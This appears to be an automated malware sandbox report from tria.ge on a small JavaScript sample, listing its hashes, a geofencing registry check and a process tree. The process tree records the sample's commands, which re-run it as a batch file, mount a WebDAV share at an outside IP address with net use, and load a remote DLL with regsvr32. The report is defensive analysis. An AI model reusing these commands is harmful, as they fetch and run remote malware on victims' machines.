Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource
win10v2004-20240709-en
General
-
Target
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
-
Size
5KB
-
MD5
81ff023b48275d5a6b535a2370fce4a3
-
SHA1
9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
-
SHA256
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
-
SHA512
47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849
-
SSDEEP
96:1cmrqBIO0hGCoFWU6660aBFWU6660WowHZJAcn2PqjVRQ6iVpPkY:1vqaUCoFWU6665BFWU666PMS2PqjVRgF
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1396 wrote to memory of 3864 1396 wscript.exe 80 PID 1396 wrote to memory of 3864 1396 wscript.exe 80 PID 3864 wrote to memory of 4344 3864 cmd.exe 82 PID 3864 wrote to memory of 4344 3864 cmd.exe 82 PID 3864 wrote to memory of 4192 3864 cmd.exe 83 PID 3864 wrote to memory of 4192 3864 cmd.exe 83
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js" "C:\Users\Admin\\afzwlo.bat" && "C:\Users\Admin\\afzwlo.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:4344
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\220.dll3⤵PID:4192
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD581ff023b48275d5a6b535a2370fce4a3
SHA19de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
SHA25604c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
SHA51247f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849